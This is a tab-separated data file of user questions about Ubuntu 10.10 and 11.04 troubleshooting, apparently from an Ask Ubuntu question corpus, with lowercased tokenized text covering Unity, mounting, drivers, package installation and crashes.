40167	lenovo s10-3 freezes when resuming from sleep	i have been browsing forums all day but ca n't find a solution to this irritating bug . when i put my computer to sleep , everything seems to work fine ( leds flash , etc ) . when i try to resume though , the laptop just freezes . i have to do a hard reset . this problem occurred with ubuntu 10.10 , but only intermittently ( like once every 4 or 5 times ) . after i updated to 11.04 , it freezes every time i try to resume from sleep . anyone else have this problem and found a solution ? i love 11.04 but this issue is really annoying me . thanks , kevin
40169	bypass `` do you want to ... '' dialog after clicking script	after i create a bash script and double click it in nautilus i am prompted with this - do you want to run `` sleepytime '' , or display its contents ? with run in terminal , dislpay , cancel and run as options . is it possible to just choose `` run '' or `` run in terminal '' by default ?
40171	terminal bell without a pc speaker	i do not have an internal speaker in my computer . usually , i rely on the window manager to play a beep through my soundcard when there 's a terminal bell , but since i upgraded , that is not working . i 've read that this might be because of compiz , and i tried adding the following to my /etc/pulse/default.ca , but it is not working : load-sample-lazy x11-bell /usr/share/sounds/gnome/default/alerts/drip.ogg load-module module-x11-bell sample=x11-bell can anyone give me a hint here ?
40173	expose ( osx style ) functionality in unity	does anyone know if there is a application window expose ( a la mac osx ) for the unity desktop . i 've used the compiz expose plugin , but that performs an `` expose '' on workspaces . i 'm looking for something which will show me all of the active windows and allow me to select one . i know this functionality is included in the launder bar , but frankly - this is bogus . i do n't want to search for little tick marks , i want a representation of all of the open windows in the application area of unity . this simply can not not exist in a `` unified '' window environment such as osx / unity .
40174	how to active opengl in a hp dv6700 with intel graphics card	the video card is a mobile gm965/gl960 integrated graphics controller with 256mb . the user can not play anything that uses opengl since it runs really slow . but on windows it runs perfect . using ubuntu 11.04 without any effects in ubuntu classic ( no effects )
40175	ways to hide an ip ?	i was reading `` how to surf anonymous '' , following which i typed $ sudo apt-get install tor privoxy but it seems like the package is not available reading package lists ... done building dependency tree reading state information ... done package tor is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'tor ' has no installation candidate so i was wondering what are some good and convenient ways to hide ip ? is it by using proxy ? if yes , does it provide a list of proxies to save me from looking up by google , and do i have a choice for where the new ip will be from ? my main browser is firefox 3.6.17 and sometimes i am using google chrome . my os is ubuntu 10.10 . thanks !
40176	how much space do i need to create a backup with fsdisk	i get this error when mounting a drive [ 4337.380506 ] ext4-fs ( sda ) : bad geometry : block count 156282966 exceeds size of device ( 156282701 blocks ) so if i try to fix it with sfdisk do i need space for the entire drive ( 640gb ) or just as much as the data that is on the disk contains ? ( about 400gb ) backup like so sfdisk -d /dev/sda > pt.txt i 'm trying to follow this help here - http : //ubuntuforums.org/showpost.php ? p=9485779 & postcount=7
40178	is thunderbird still being updated ? mine has n't updated and a new update issued last week	mozilla released an update to thunderbird last week ( version 3.1.10 ) . this update addressed security issues . so my understanding is that 10.04 ubuntu should receive the update . but my thunderbird installation from the main repository has not updated . why not ? do i have the configuration wrong ? to get updates do i need to install the mozilla ppa ?
40179	problem with windows 7 and ubuntu 11.04 ?	first of all this is the proceed that i followed to install it : i deleted system partition ( that uses 100mb and store the boot files ) from my hd and i write the boot on my c : where windows is installed . then i inserted the cd with ubuntu and i loaded it , then i selected the option that allows you to install with windows 7 , i resized c : partition , and the installation started . after all the installation finished , ubuntu ran well , then i restarted , grub loaded , and i selected windows 7 loader or something like that , windows started to load , it shows the progress bar , and then bam ! a bsod appeared , i restarted and i tried to load windows again , bsod again , but another problem appeared , my pc restarts again , but grub does n't load anymore and my pc starts to reboot and reboot , so i had to force it tu turn off . then i had to repair mbr with windows dvd , and magically windows 7 loaded . my question is , how can i fix this because i really want to use ubuntu 11.04 ?
40185	how can i specify the order in which filesystems are automatically mounted ?	i need a particular row in /etc/fstab to be mounted always after two other rows : # always mount these first uuid=fdf38dd4-9e9d-479d-b830-2a6989958503 / ext4 noatime , discard , errors=remount-ro 0 1 uuid=2b548eb8-fa67-46ce-a998-91d587dba62f /home/.hdd ext4 errors=remount-ro 0 2 # always mount this second none /home/ak aufs br : /home/.ssd/ak=rw : /home/.hdd/ak=rw 0 0 the current behavior is to often reverse the order of the last two rows in an unpredictable manner . how can i specify the necessary order ?
40186	ca n't drag maximized windows from the panel like i could in the beta	while in beta i could just drag the panel ( in unity ) and the maximized windows would be restored to normal size . now i can only drag it using the alt key . is this a design choice to make us use the buttons on the left or did i just disable something by mistake ? is there any way to get the previous behavior back ?
40191	nfs share - trying to mount my synology 1511+ nas	i am running ubuntu 10.10 64 bit on my mac mini . after installing nfs-common , and attempting to mount using mount -t nfs4 -o proto=tcp , port=2049 192.168.1.139 : /volume1/magneto/ ./test i keep getting this error : mount.nfs4 : mounting 192.168.1.139 : /volume1/magneto/ failed , reason given by server : no such file or directory when i run showmount -e 192.168.1.139 export list for 192.168.1.139 : /volume1/magneto * it seems to indicate that the volume is there and that i 'm typing the correct thing . i tried removing the trailing slash and no luck . does anyone have any idea why this is happening ? i 'm using this nas : http : //www.synology.com/us/products/ds1511+/index.php
40192	update manager integration	will the update manager and the software center be merged into one in a future release ? i think that would be an ideal thing to do , and i believe packagekit does that .
40194	browser crashed in natty	my system froze while i was installing ubuntu-restricted-extras in natty . so i restarted . after that firefox crashed and it is not properly showing websites . same goes for the chromium browser . any help would be appreciated .
40207	ubuntu asks for password several time when logging in	when ever i log into my machine ( lenovo laptop ) ubuntu ( natty running unity ) ask for the keyring password several times ( 4-5 ) why does it do that and how can i make it stop ?
40209	forcing nautilus to use kerberos ( active directory ) authentication	is there a way to get nautilus or any other file manager that runs on ubuntu 11.04 to use kerberos for authentication ? i 'm using likewise open to join machines to the domain , and i ca n't type in passwords for every user on every computer that needs to mount a network share . i 've been able to get kerberos working with the command line smbclient , but oddly kerberos does not seem to be nautilus-integrated . i also checked the ssh config file , and it looks like you can enable gssapiauthentication , but it only works for kerberos v2 , not the current version , which i think is v5 .
40211	can not mount disk at all . detailed explanation , need help	i can no longer mount an extra internal hard drive on my ubuntu 11.04 64-bit system . i could up until a few days ago . i think this has something to do with the problem -- -- i had added a line at the end of fstab for the drive ( /dev/sda ) to automount , but i do n't think it worked so i then removed the line from fstab . i think that i removed the line while the drive was mounted . the drive will no longer mount via gui or cli . at least i think the problem is related to this , it may not be at all . trying to mount : $ sudo mount /dev/sda /media/openspacei ( i realize this is not /dev/sda1 - i do n't have an /dev/sda1 ) gui : that gives this error : mount : wrong fs type , bad option , bad superblock on /dev/sda , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so gui : here is the print out from dmesg | tail : $ dmesg | tail [ 9344.234380 ] compiz [ 6098 ] : segfault at 28 ip 00007f1fa0641335 sp 00007fff0b306700 error 4 in libregex.so [ 7f1fa063c000+8000 ] [ 9987.879043 ] nautilus [ 6899 ] : segfault at 1505b817b60f ip 00007ff6eeefdb8d sp 00007fff09aa6170 error 4 in libgobject-2.0.so.0.2800.6 [ 7ff6eeeca000+4e000 ] [ 10001.231835 ] compiz [ 7360 ] : segfault at 28 ip 00007f38e0cfe335 sp 00007fff3228d380 error 4 in libregex.so [ 7f38e0cf9000+8000 ] [ 10113.817592 ] compiz [ 7429 ] : segfault at 28 ip 00007f01c11cd335 sp 00007fffac4f4250 error 4 in libregex.so [ 7f01c11c8000+8000 ] [ 10116.592022 ] compiz [ 7651 ] : segfault at 28 ip 00007f4369548335 sp 00007fffb3b2b030 error 4 in libregex.so [ 7f4369543000+8000 ] [ 10117.958485 ] compiz [ 7666 ] : segfault at 28 ip 00007f3861d7d335 sp 00007fff268395d0 error 4 in libregex.so [ 7f3861d78000+8000 ] [ 10366.207793 ] ext4-fs ( sda ) : bad geometry : block count 156282966 exceeds size of device ( 156282701 blocks ) [ 10855.975855 ] ext4-fs ( sdb ) : mounted filesystem with ordered data mode . opts : ( null ) [ 10863.666747 ] ext4-fs ( sda ) : bad geometry : block count 156282966 exceeds size of device ( 156282701 blocks ) [ 11125.922998 ] ext4-fs ( sda ) : bad geometry : block count 156282966 exceeds size of device ( 156282701 blocks ) my fstab file now : i also ran disk utility on the disk . disk is good and healthy . here are the screenshots from that : the drive contains no partitions and is formated to ext4 see - fdisk - and e2fsck screen you can see in the e2fsck.png that the filesystem size blocks differ by 265 from the physical size blocks if you do the math . i 'm bummed , i really do n't want to have to wipe the data off this disk . a funny thing i noticed is that the mount point ( /media/openspacei ) still remains . usually after an unmount the directory disappears . any help getting this disk mounted would be extremely appreciated . # # edit : okay , i 'm ready to give up . is there a way i can see a list of anything on the disk before things went off the rails ? # # i really appreciate everyone who tried to help me out . i may try to make an image of the disk and work on it later . i move across the country the day after tomorrow .
40213	what happened to the visual effects tab , in the appearance window ?	i just upgraded my ubuntu 10.10 to the latest 11.04 , but i 'm not seeing the visual effects tab in the appearance window . i want to enable/disable extra visual effects like in 10.10 . please help !
40215	how can i add amarok to the launcher ?	when i try to drag the amarok icon from the dash into the launcher , the icon just disappears . how do i get it to stay ?
40219	monitor preferences > monitor : unknown	root @ tarvid-laptop : ~ # ddcprobe vbe : vesa 3.0 detected . oem : intel ( r ) cantiga graphics chip accelerated vga bios vendor : intel corporation product : intel ( r ) cantiga graphics controller hardware version 0.0 memory : 65472kb mode : 1280x1024x256 mode : 1280x1024x64k mode : 1280x1024x16m mode : 1024x768x256 mode : 1024x768x64k mode : 1024x768x16m mode : 640x480x16m mode : 800x600x64k mode : 800x600x16m mode : 640x480x256 mode : 800x600x256 mode : 640x480x64k edid : edid : 1 3 id : 2201 eisa : spt2201 serial : 00000ba2 manufacture : 37 2007 input : sync on green , analog signal . screensize : 47 30 gamma : 2.200000 dpms : rgb , active off , no suspend , no standby timing : 720x400 @ 70 hz ( vga 640x400 , ibm ) timing : 720x400 @ 88 hz ( xga2 ) timing : 640x480 @ 60 hz ( vga ) timing : 640x480 @ 67 hz ( mac ii , apple ) timing : 640x480 @ 72 hz ( vesa ) timing : 640x480 @ 75 hz ( vesa ) timing : 800x600 @ 60 hz ( vesa ) timing : 800x600 @ 72 hz ( vesa ) timing : 800x600 @ 75 hz ( vesa ) timing : 832x624 @ 75 hz ( mac ii ) timing : 1024x768 @ 87 hz interlaced ( 8514a ) timing : 1024x768 @ 70 hz ( vesa ) timing : 1024x768 @ 75 hz ( vesa ) timing : 1280x1024 @ 75 ( vesa ) ctiming : 1152x864 @ 60 ctiming : 1280x800 @ 60 ctiming : 1280x1280 @ 60 ctiming : 1280x960 @ 60 ctiming : 1280x1024 @ 60 ctiming : 1360x850 @ 60 ctiming : 1440x1440 @ 60 ctiming : 1680x1680 @ 60 dtiming : 1920x1080 @ 69 monitorrange : 15-94 , 24-77 monitorname : sceptre monitorname : x22wg-1080p
40226	can the applications or files and folders buttons be moved on the unity launcher ?	is there a way to move the applications or files & folders buttons on the unity launcher ? i can move every other button but those . i 'd like to move them to the top of the bar instead of their default at the bottom of it . thanks
40234	how do i use my own icon in a python script integrated with the messaging menu ?	i 'm trying to customize an old python script i like a lot , specifically gmail-notifier . it uses the default mail icon in the messaging menu instead of the gmail icon a lot of similar programs use . i was wondering how to go about using my own icon . i 've been looking through the code and nothing stands out to me as to what to change for the small icon in the menu , i 've only been able to change the pop-up notification icon . i tried changing the shortcut 's icon , but that only gave an error icon in the messaging menu . anyway , i 'm stumped ... any advice ?
40236	how to take daily backup of database ?	hey i am using mysql in ubuntu along with 15 more ppl who also has root privilege . i am afraid they might accidentally tamper with the database , so i want to take a daily and hourly incremental backup of the database , and its privileges . can anyone help me with a solution ? note : i can cron mysqldump , but i need to do svn kind of thing so that i can see the changes , too .
40237	no unity when running ubuntu 11.04 ( 64 bit ) under virtualbox+windows 7 ( 64 bit )	before the first login screen came up after a clean install of ubuntu 11.04 ( 64 bit ) into a new virtual machine in virtualbox running under windows 7 ( 64 bit ) , a dialog box popped up saying that the hardware was not sufficient to run unity ( paraphrased ) . all logins have taken me to the classic de and i ca n't find a way to even try unity . in the desktop settings , i have selected `` ubuntu '' and not `` ubuntu ( classic ) '' . the system is configured so i must log in , and a `` session '' option is available at the bottom of the screen , but regardless of the session i choose , no unity . after installing the virtualbox guest additions , the classic de would resize as the host window resized , but still unity would not display . i do n't know if this is a video problem , memory , or something else . the vm has 1024mb ram , 2 processors , 3d acceleration , and 12mb of video memory . it would be very nice to see what all the unity fuss is about ! eric
40239	use linux commands on windows directories through ssh	since i 'm stuck with windows at work . i 'd like to use a ubuntu server machine which i access through ssh from a windows machine to manipulate files on the windows machine . i 've been moving files up to the ubuntu machine through ftp , working on them and then downloading them . please tell me there is a more efficient solution . thanks for your help !
40240	how can i remotely participate in the uds ?	how can i participate remotely in the upcoming uds ? someone wrote an excellent article for remote participation for uds-n but i could n't find any information for the coming summit . any information and links will be helpful . also last time it was advised to use gobby notes but i totally failed to connect to any server . is there an alternative for gobby notes or some other way to read logs of uds sessions ? thanks in advance !
40241	is there any interactive or more user-friendly version of gdb for debugging ?	is there any interactive or more user-friendly version ( or substitution ) of gdb for debugging ? some people suggested cgdb , but after a few tests i found it buggy and unstable .
40243	how to link with a webdav application in unity ?	in ubuntu 10.10 maverick , i could go to the places menu and click `` connect to server '' to run a webdav server for my nextapp websharing android application . but in unity , i 'm not sure how i achieve the same thing . i tried `` shared folders '' but it says i 'm missing plugins . ( i uninstalled evolution and everything related to it , if that helps . )
40250	random x crashes in ubuntu 11.04	i 've been getting random x crashes in ubuntu 11.04 the last few days . this occurs both at work and at home , i.e . on a lenovo t series thinkpad and on an acer aspire 58x-series ( if memory serves ) . this is the backtrace in the xorg.log from the most recent one : backtrace : [ 182.057 ] 0 : /usr/bin/x ( xorg_backtrace+0x3b ) [ 0x80eab1b ] [ 182.057 ] 1 : /usr/bin/x ( 0x8048000+0x5fac8 ) [ 0x80a7ac8 ] [ 182.057 ] 2 : ( vdso ) ( __kernel_rt_sigreturn+0x0 ) [ 0xc6440c ] [ 182.057 ] 3 : /usr/bin/x ( _callcallbacks+0x3e ) [ 0x8074e1e ] [ 182.057 ] 4 : /usr/bin/x ( writetoclient+0x267 ) [ 0x80a7607 ] [ 182.057 ] 5 : /usr/lib/xorg/modules/extensions/libdri2.so ( procdri2waitmscreply+0x62 ) [ 0xc07bf2 ] [ 182.057 ] 6 : /usr/lib/xorg/modules/extensions/libdri2.so ( dri2waitmsccomplete+0x75 ) [ 0xc05fc5 ] [ 182.057 ] 7 : /usr/lib/xorg/modules/drivers/intel_drv.so ( 0x2fd000+0x2261c ) [ 0x31f61c ] [ 182.057 ] 8 : /usr/lib/xorg/modules/drivers/intel_drv.so ( 0x2fd000+0x87c2 ) [ 0x3057c2 ] [ 182.057 ] 9 : /lib/i386-linux-gnu/libdrm.so.2 ( drmhandleevent+0xf5 ) [ 0xd23665 ] [ 182.057 ] 10 : /usr/lib/xorg/modules/drivers/intel_drv.so ( 0x2fd000+0x7927 ) [ 0x304927 ] [ 182.057 ] 11 : /usr/bin/x ( wakeuphandler+0x52 ) [ 0x8074602 ] [ 182.057 ] 12 : /usr/bin/x ( waitforsomething+0x1ba ) [ 0x80a1f3a ] [ 182.057 ] 13 : /usr/bin/x ( 0x8048000+0x27f1e ) [ 0x806ff1e ] [ 182.057 ] 14 : /usr/bin/x ( 0x8048000+0x1a81c ) [ 0x806281c ] [ 182.057 ] 15 : /lib/i386-linux-gnu/libc.so.6 ( __libc_start_main+0xe7 ) [ 0x152e37 ] [ 182.057 ] 16 : /usr/bin/x ( 0x8048000+0x1a411 ) [ 0x8062411 ] [ 182.057 ] segmentation fault at address 0xb7464008 [ 182.057 ] caught signal 11 ( segmentation fault ) . server aborting [ 182.057 ] please consult the the x.org foundation support at http : //wiki.x.org i 'm using unity on both computers . the x crashes started yesterday or the day before yesterday . maybe a broken update ? the two computers have different graphics cards .
40257	how to follow someone at gwibber for twitter	i have added my twitter account in gwibber and the timeline is showing correctly . i would like to know , how can i follow someone through gwibber . for example in hotot , i can click on the icon and then click on `` follow '' . may be there is a way to do that in gwibber also but i ca n't find it .
40258	is there a way to use gmail call phone functionality with empathy/pidgin	is there a way that i can use this functionality with any desktop client especially something like empathy ? http : //www.google.com/chat/voice/ i am referring the phone call function not just video chat which i know how to enable and use both in pidgin and empathy .
40259	how can i visually find out which programs are running on the current virtual screen in unity ?	since switching to unity in 11.04 i miss the bottom only for one thing : i want to know which windows are on the current virtual screen . i switch between windows with alt+tab and sometimes i do n't remember if the program i need is running on the current screen . in the launcher there are white dots that shows running programs . but they show this for all virtual screens and this is not what i need . is there a way for example to setup launcher so it shows white dots only for current virtual screen ?
40261	unity freezes after compiz configuration change	well this is a follow-up question regarding ubuntu 11.04 randomly logs out in middle of use . after some people suggested i re-install i used the beta1 iso to reinstall and upgraded instantly about 3-4 times ( the whole process ) . but now i am facing a bizarre situation where if i change something than default compiz settings it freezes and i can not do anything other then drop to tty1 and reboot . the problem will persists on reboot as well every session . i was wondering if it was unity or compiz . is the default compiz not to be altered for use with unity . basically i want to disable animations desktop zooms etc and enable some compiz functionality . thanks in advance
40267	what does this parser error mean and how can it be fixed ?	well , i messed up everything and was forced to remove and re-install the system . everything is fixed now , but for the sake of knowledge , i want to know what this error means exactly . it shows up after booting ubuntu ( instead of the plymouth boot screen ) . how it can be fixed ? parser error : error opening file /lib/plymouth/themes/ubuntu-logo/ubuntu-logo.script
40272	how do we install unity-2d and dependencies offline ?	we have installed 11.04 32-bit on an old machine that has no internet connection and with a graphics card that is not suitable for running compiz or unity . still , we would like to run unity-2d on this machine . we are aware of answers to this question . sadly keryx will not run on 11.04 32-bit because of unmet dependencies . building an offline repository is not an option because of limited storage capacity . is there any convenient other way to find , download , install , and eventually update unity-2 and all dependencies ( preferably from an os independent download path ) ?
40273	how to protect hard disk ?	i have 320 gb hard disk on my laptop and i have installed ubuntu 11.04 on 1 partition and another partition is reserved for storage . i want to protect that storage partition with a password . how can i do that ?
40277	mounting a safely removed external disk	if i unmount a drive in ubuntu how could i mount it again without physically reconnecting the drive ? i 'm using ubuntu 11.04
40279	is it possible to install python 2.5 in 11.04 ?	i occasionally have to work on some legacy python code that is run by the python 2.5 interpreter in production . i 'd like to set my development environment up just like production , so i need to install the python2.5 family of packages . of course , i can install from source , but i 'd really prefer to use packages unless there is absolutely no way to do it . however , the 2.5 packages are not included in any of the apt sources that ship with 11.04 . where can i find python 2.5 packages that are likely to work smoothly with natty ? update : it works ! i should have read the apt-get output more closely : e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . so here 's what i did to get python 2.5 installed : : josh @ josh ; sudo add-apt-repository ppa : fkrull/deadsnakes : josh @ josh ; sudo apt-get update : josh @ josh ; sudo apt-get install python2.5 [ ... ] the following packages have unmet dependencies : python-minimal : breaks : python2.5-minimal ( < 2.5.5-7 ) but 2.5.4-1ubuntu6.1 is to be installed python2.5 : depends : python2.5-minimal ( = 2.5.5-8~ppa2~natty3 ) but 2.5.4-1ubuntu6.1 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . : josh @ josh ; sudo apt-get -f install [ ... ] the following extra packages will be installed : python2.5-minimal recommended packages : python2.5 the following packages will be upgraded : python2.5-minimal [ ... ] do you want to continue [ y/n ] ? [ ... ] setting up python2.5-minimal ( 2.5.5-8~ppa2~natty3 ) ... : josh @ josh ; sudo apt-get install python2.5 the following new packages will be installed : python2.5 [ ... ]
40281	how to add my favorite places as a quicklist in my home 's icon in unity with other languages ?	this question is related to the following question , just adapted to use this solution for other languages . i 'm working with german as main language and it works for me with videos and downloads , but not for the `` translated '' folders like `` bilder '' for pictures , `` dokumente '' for documents and `` musik '' for music . i 'm not the fittest in linux , can you please tell me what to change ? just replace every music with musik in nautilus-home.desktop ? thanks solved ! i tried in a vm to change it like mentioned above and everything works fine !
40282	why does nautilus hang while opening home folder ?	i have a laptop pentium dual core 2.16 ghz with 2 gb ram while opening home folder or any other folder in that matter window becomes unresponsive . i tried to reduce nice values of some processes in system monitor still problem exists . due to this i ca n't open any file in any folder .
40283	canon lide 110 - lsusb sane-find-scanner	i 'd like to use a canon lide 110 scanner under ubuntu 10 . here are the results of lsusb and sane-find-scanner : $ lsusb bus 008 device 002 : id 1532:001a razer usa , ltd bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 003 : id 0471:0602 philips ati remote wonder ii input device bus 007 device 002 : id 1532:0019 razer usa , ltd bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 004 : id 0dc6:5300 precision squared technology corp . bus 006 device 003 : id 0dc6:5000 precision squared technology corp . bus 006 device 002 : id 1532:001b razer usa , ltd bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 007 : id 04a9:1909 canon , inc . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub and $ sudo sane-find-scanner # sane-find-scanner will now attempt to detect your scanner . if the # result is different from what you expected , first make sure your # scanner is powered up and properly connected to your computer . # no scsi scanners found . if you expected something different , make sure tha # you have loaded a kernel scsi driver for your scsi adapter . # no usb scanners found . if you expected something different , make sure that # you have loaded a kernel driver for your usb host controller and have setu # the usb system correctly . see man sane-usb for details . # sane has been built without libusb support . this may be a reason # for not detecting usb scanners . read readme for more details . # not checking for parallel port scanners . # most scanners connected to the parallel port or other proprietary ports # ca n't be detected by this program .
40287	/etc/profile not being sourced	for 11.04 , i did a fresh install of my system . part of that install was to install rvm , which sticks a rvm.sh in /etc/profile.d/ . this does n't work as /etc/profile ( which loads each +r in /etc/profile.d/*.sh ) is not being loaded . according to the documentation , the profile is only sourced if bash is run in login . to verify this , i invoked bash -- login , after which rvm was available . this has worked for me in previous versions of ubuntu without any configuration . that is , a fresh install of 10.10 will correctly source profile/.d . my question is : is there anything i 'm doing wrong , or are there some new assumptions being made in natty that have broken this ? my current workaround is to source /etc/profile in ~/.bashrc ( which is awful as profile is meant to load before bashrc 's , but does the trick ) .
40293	libpoppel.so.7 is missing when running xournal	when i try to run xournal i get the following error : xournal : error while loading shared libraries : libpoppler.so.7 : can not open shared object file : no such file or directory i should note that i ln -s the prviuos errors since the *.so.i had i smaller than the one i had installed . how can i overcome this ?
40295	distribution upgrade froze my system	just tried to upgrade to 11.04 with update manager . near the end of the `` installing the upgrades '' phase , my computer froze completely ; the mouse is n't working and the keyboard is flashing . i do n't dare restart in case i break the system completely , but do i have any alternative ?
40296	unable to shutdown , only reboot	ever since i upgraded to 11.04 , i have been unable to shutdown my computer . i tried using : shutdown now , poweroff , and halt . but they do n't work ! the only one that does is reboot . here is the output of running lspci in terminal . 00:00.0 host bridge : intel corporation core processor dmi ( rev 11 ) 00:03.0 pci bridge : intel corporation core processor pci express root port 1 ( rev 11 ) 00:08.0 system peripheral : intel corporation core processor system management registers ( rev 11 ) 00:08.1 system peripheral : intel corporation core processor semaphore and scratchpad registers ( rev 11 ) 00:08.2 system peripheral : intel corporation core processor system control and status registers ( rev 11 ) 00:08.3 system peripheral : intel corporation core processor miscellaneous registers ( rev 11 ) 00:10.0 system peripheral : intel corporation core processor qpi link ( rev 11 ) 00:10.1 system peripheral : intel corporation core processor qpi routing and protocol registers ( rev 11 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) 00:1c.3 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 4 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 ide interface : intel corporation 5 series/3400 series chipset 4 port sata ide controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 00:1f.5 ide interface : intel corporation 5 series/3400 series chipset 2 port sata ide controller ( rev 05 ) 01:00.0 vga compatible controller : nvidia corporation g94 [ geforce 9600 gt ] ( rev a1 ) 02:00.0 sata controller : jmicron technology corp. jmb362/jmb363 serial ata controller ( rev 02 ) 02:00.1 ide interface : jmicron technology corp. jmb362/jmb363 serial ata controller ( rev 02 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 03 ) 04:00.0 sata controller : jmicron technology corp. jmb362/jmb363 serial ata controller ( rev 03 ) 04:00.1 ide interface : jmicron technology corp. jmb362/jmb363 serial ata controller ( rev 03 ) 05:03.0 multimedia controller : philips semiconductors saa7130 video broadcast decoder ( rev 01 ) 05:04.0 ethernet controller : via technologies , inc. vt6102 [ rhine-ii ] ( rev 43 ) 05:05.0 network controller : broadcom corporation bcm4306 802.11b/g wireless lan controller ( rev 02 ) does anyone know what happened ? thank you !
40303	ralink rt2860 wifi not working under ubuntu 11.04	i just bought a zotac zbox blu-ray 3d id36 which includes a ralink rt2860 wifi network adapter and i canâ´t get it to work under ubuntu 11.04 . i 've already downloaded , compiled and install the drivers from the manufacturer 's webpage and i 've spent more than 7 hours searching for a solution . i 've also tried installing windows drivers through ndiswrapper without success , and i have tried every solution that has appeared on my screen . could it be related with the fact that i 'm using ubuntu 11.04 instead of an older version with an older kernel ? or is it just that it is impossible to make that network adapter work under ubuntu ? i would be very grateful if you 'd be too kind to enlighten me with your knowledge .
40305	usb audio on 0 volume on startup	i have a usb audio system , on every system start , its volume is zero . i can not set it with the regular sound widget in the notification area but have to use alsamixer in the terminal . any ideas why it is reduced to zero on every startup ?
40306	prompt takes very long before showing up in new terminal window	when i start my natty computer and open a terminal , it takes like 20 seconds before the prompt show up . i did not change my .bashrc lately , it appears that this started after the upgrade to 11.04
40307	why does plymouth boot in fallback text mode ?	when starting my system , plymouth does n't show graphics but uses the fallback text mode . however , it runs normally ( that is , with graphics ) on shutdown . why is that ?
40312	after changing compiz configs - the panels disappeared	after changing compiz configs - the panels disappeared i just see my files on the desktop , problem i cant open settings to reset the compiz settings or what ever happend . how do i solve this ?
40318	kernel bugs on launchpad	i 've found what i believe to be a kernel bug , and reported appropriately on launchpad . but is the kernel bugs reported on launchpad receive attention from the developers ? it is important since , in this case , it was reported not to be distro-specific . the bug in question is kernel 2.6.38-7 completely dims screen on intel gma 4500m . please note that this is the very first bug i 've reported , and as such i do n't know any of the usual values and convention/format of the data that i can conform to .
40320	`` unable to copy the user 's xauthorization file ''	i 'm trying to install a .deb package in natty using gdebi package installer : but when i click `` install '' , the following error message comes up : also , when i try to install anything from the software center , nothing happens . i 'm guessing this is related to the above error . could someone please help me out with this ? edit : my home folder does not have a .xauthority file .
40321	how can i use launchpad.net packages in 11.04 ?	launchpad.net is a fantastic repository of packages , and one that i use often to install packages that are not included in the main repository . thus far , i 've always simply browsed to a package page ( e.g . https : //launchpad.net/ubuntu/natty/amd64/python-reportlab/2.5-1ubuntu1 ) and manually downloaded the deb file , which kicks off the ubuntu software center and lets me easily install the package . it would be even cooler if i could use launchpad.net as a regular apt source , i.e . by doing something like this : echo 'deb https : //launchpad.net/ubuntu natty amd64 ' | sudo tee -a /etc/apt/sources.list does anyone know what the correct sources line would be ?
40325	how to install beagle ?	i 've been trying to install beagle on my 11.04 installation of ubuntu . the beagle site says that beagle is shipped with ubuntu . but from the software center in ubuntu , a search for beagle returns zero results . any help would be appreciated .
40329	gvim maximized with a gray line like status line	when i maximize gvim , at the bottom of the window i see about 20 pixels of gray line . to the right there is just 4 pixels of the same gray from top to bottom . i had the same gray before 11.04 , but at least twice smaller and did n't bother to fix it or ask about it . a small note is that even that i use gvim my options are like console . i.e . without menu and scrollers .
40332	how to make selected tab in terminal more prominent	something about the color scheme changed in 11.04 , and now it 's very difficult for me to tell which tab is the selected one . on my screen , the colors look more similar the further down i slouch in my chair ( i.e . angle of view ) . if i change the color scheme the problem is solved , but that solution is too extreme for me . is there a way to just change the color of the selected tab in terminal , or otherwise make it more prominent ? update : in 12.10 the accepted solution does n't work . can anyone fix it ?
40335	unable to install programmes after upgrade	i upgraded to 11.04 today . i had some problems when the system froze with 2 minutes to go ; i was forced to do a hard reboot , but the system appeared to work ok. ( described here : distribution upgrade froze my system ) as the system had n't been cleaned up before rebooting , i ran computer janitor , but had to stop it when i saw it was deleting things i needed to keep ( e.g . faenze icons vanished ) . since then i have been unable to install anything via apt-get , synaptic or software centre . i can add ppas , but attempting to install anything returns the following message : e : sub-process /usr/bin/dpkg returned an error code ( 1 ) the only way i can install anything is by downloading the deb and installing manually . trying to install with the software centre causes a window to open saying `` an unhandled error occurred ) . clicking on `` details '' reveals the following : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 961 , in simulate trans.unauthenticated = self._simulate_helper ( trans ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 1085 , in > _simulate_helper return depends , self._cache.required_download , \ file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 226 , in required_download pm.get_archives ( fetcher , self._list , self._records ) systemerror : e : i was n't able to locate file for the rec-applet package . this might mean > you need to manually fix this package . however , when i try to repost the problem , another window opens with the title `` problem in aptdaemon '' and the problem can not be reported : you have some obsolete package versions installed . please upgrade the following > packages and check if the problem still occurs : python-gobject edit - i tried jordy 's solution . when i then checked for local or obsolete packages in synaptic , one was marked in red and marked for removal ( rec-applet ) . when i attempt to remove it , i get the message : e : rec-applet : subprocess installed post-removal script returned error exit status 1 it 's as if that was blocking everything else , but there doesn ; 